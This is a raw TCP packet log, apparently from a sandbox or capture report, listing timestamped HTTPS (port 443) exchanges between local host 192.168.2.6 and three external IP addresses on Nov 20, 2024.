Nov 20, 2024 12:38:58.182284117 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.182310104 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.182744026 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.182764053 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.182862997 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.182873964 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.191613913 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.191632032 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.191688061 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.191699982 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.191725016 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.225044966 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.225066900 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.225121975 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.225172997 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.225194931 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.236278057 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.236290932 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.236360073 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.236371040 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.237232924 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.237251997 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.237330914 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.237339020 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.237381935 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.238176107 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.238190889 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.238233089 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.238244057 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.238281965 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.239007950 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.239026070 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.239078999 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.239087105 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.239180088 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.275321007 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275341034 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275423050 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.275497913 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275537014 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.275721073 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275768042 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275779963 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.275794983 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.275840044 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.284238100 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.284255028 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.284327984 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.284344912 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.317692041 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.317718029 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.317783117 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.317833900 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.531337023 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.586695910 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.803347111 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.803406954 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.830907106 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.830931902 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.831011057 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839145899 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839180946 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839205980 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839224100 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839260101 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839277983 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839296103 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839332104 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839351892 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839389086 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839389086 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839389086 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839411974 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839437008 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839461088 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839482069 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839503050 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839524984 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839575052 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839581013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839607954 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839642048 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839648008 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839648008 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839682102 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839684010 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839694023 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839740992 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839742899 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839785099 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839795113 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839803934 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839823008 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839863062 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:58.839893103 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.839970112 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:58.840145111 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.047367096 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.049621105 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.153219938 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.153281927 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.153423071 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.166830063 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.166850090 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.166872978 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.166990995 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167006016 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167028904 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167093039 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167107105 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167133093 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167160034 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167177916 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167207956 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167217970 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167244911 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167268038 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167285919 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167347908 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167347908 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167365074 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167387962 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167421103 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167447090 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.167509079 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167509079 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.167589903 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.375345945 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.375688076 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.431797981 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.431868076 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.431943893 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.435777903 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.435791969 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.435822964 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.435873032 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.436000109 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.436017036 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.436058998 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.436104059 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.436147928 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.436173916 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.436252117 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.620656013 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.620698929 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.620788097 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.632966995 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.633006096 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.633049965 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.633110046 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.633153915 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.633212090 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.633270025 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.633379936 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.633459091 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.843338013 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.883693933 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.939366102 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.939412117 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.939487934 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.944502115 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.944545031 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.944591045 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.944624901 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.944690943 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.944695950 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.944745064 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:38:59.944811106 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.944910049 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:38:59.944945097 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.155343056 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.177103043 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.177180052 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.177282095 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.184319019 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.184331894 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.184381962 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.184417963 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.184487104 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.184536934 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.184552908 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.184644938 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.184756041 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.184799910 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.395342112 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.446053982 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.614083052 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.614139080 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.614206076 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.622392893 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.622411013 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622450113 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622478008 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622498989 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622539043 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.622556925 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622584105 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622617960 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622646093 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.622698069 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.622766972 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.622827053 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.831337929 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.834400892 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.857001066 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.857038975 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.857119083 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.862709999 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.862730026 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.862744093 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.862768888 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.862838030 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.862863064 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.862901926 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:00.862960100 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.863048077 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:00.863091946 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.067342997 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:01.069499969 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.411660910 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.411714077 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:01.411782026 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.417045116 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.417056084 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:01.417073965 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:01.417099953 CET | 443 | 49721 | 185.61.154.28 | 192.168.2.6 |
Nov 20, 2024 12:39:01.417136908 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.417227983 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.759850025 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.768192053 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:01.929207087 CET | 49721 | 443 | 192.168.2.6 | 185.61.154.28 |
Nov 20, 2024 12:39:02.015568972 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.015610933 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:02.015855074 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.016220093 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.016232967 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:02.545010090 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:02.545094013 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.547132015 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.547146082 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:02.547444105 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:02.548808098 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:02.591342926 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:03.031905890 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:03.032063007 CET | 443 | 49756 | 172.67.167.249 | 192.168.2.6 |
Nov 20, 2024 12:39:03.032205105 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:03.145689964 CET | 49756 | 443 | 192.168.2.6 | 172.67.167.249 |
Nov 20, 2024 12:39:04.817686081 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:04.817789078 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:04.817881107 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:04.821064949 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:04.821103096 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:05.318634987 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:05.318739891 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:05.320600986 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:05.320626974 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:05.320971966 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:05.367954969 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:05.380917072 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:05.381059885 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:05.381211996 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.277657032 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.277774096 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.277853012 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.280659914 CET | 49774 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.280685902 CET | 443 | 49774 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.382534981 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.382576942 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.382733107 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.383127928 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.383141994 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.866916895 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.867010117 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.923391104 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
Nov 20, 2024 12:39:06.923413038 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.923808098 CET | 443 | 49785 | 188.114.96.3 | 192.168.2.6 |
Nov 20, 2024 12:39:06.935620070 CET | 49785 | 443 | 192.168.2.6 | 188.114.96.3 |
